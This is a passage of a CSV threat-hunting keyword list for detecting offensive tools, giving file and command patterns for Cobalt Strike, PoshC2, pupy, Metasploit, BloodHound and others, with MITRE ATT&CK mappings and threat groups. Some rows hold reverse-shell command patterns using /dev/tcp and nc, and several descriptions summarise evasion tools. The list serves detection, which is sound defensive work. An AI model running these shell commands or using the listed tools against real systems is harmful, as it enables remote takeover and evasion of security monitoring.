Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/bin/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*/bin/gorsair *","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" +"*/bin/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*/bin/nxcdb*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/bin/posh*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/bin/pupysh*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/bin/read_i.php?a1=step2-down-b&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/read_i.php?a1=step2-down-c&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/read_i.php?a1=step2-down-j&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/read_i.php?a1=step2-down-k&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/read_i.php?a1=step2-down-r&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/read_i.php?a1=step2-down-u&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/sh | nc*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*/bin/sh -i <&3 >&3 2>&3*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*/bin/Sleeper.o*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*/bin/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*/bin/wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/bind_powershell.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/bin-sploits/*.zip*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/BITB.git*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*/BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*/bitcoin-getaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/bitcoin-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/bitcoinrpc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/bitsadmin/bitsadmin.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/BitsArbitraryFileMove*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/bittorrent-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/bjnp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*/Blackout.exe*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*/Blackout.git*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*/Blackout.sln*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*/Blackout.sys*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*/blindeventlog.exe*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*/blob/main/write_anything.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" +"*/BlockEtw.git*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*/BlockOpenHandle.git*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" +"*/bloodhound.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/bloodhound.py*","offensive_tool_keyword","crackmapexec","bloodhound integration with crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/bloodhound/enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/bloodhound_domain.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/bloodhound_domaintrust.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/bloodhound_gpo.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/bloodhound_object.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/bloodhound_ou.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/bloodhound_schema.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/bloodhound-data*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/bloodhound-quickwin.git*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" +"*/bloodyAD.git*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" +"*/bluscreenofjeff/*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*/Bo0oM*","offensive_tool_keyword","Github Username","Github username known for exploitation tools. Web application security researcher. Current Location: Moscow. Russia","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Bo0oM","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/bof.cpp *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/bof.h","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","0","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"*/BOF.NET/*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*/bof.nim","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 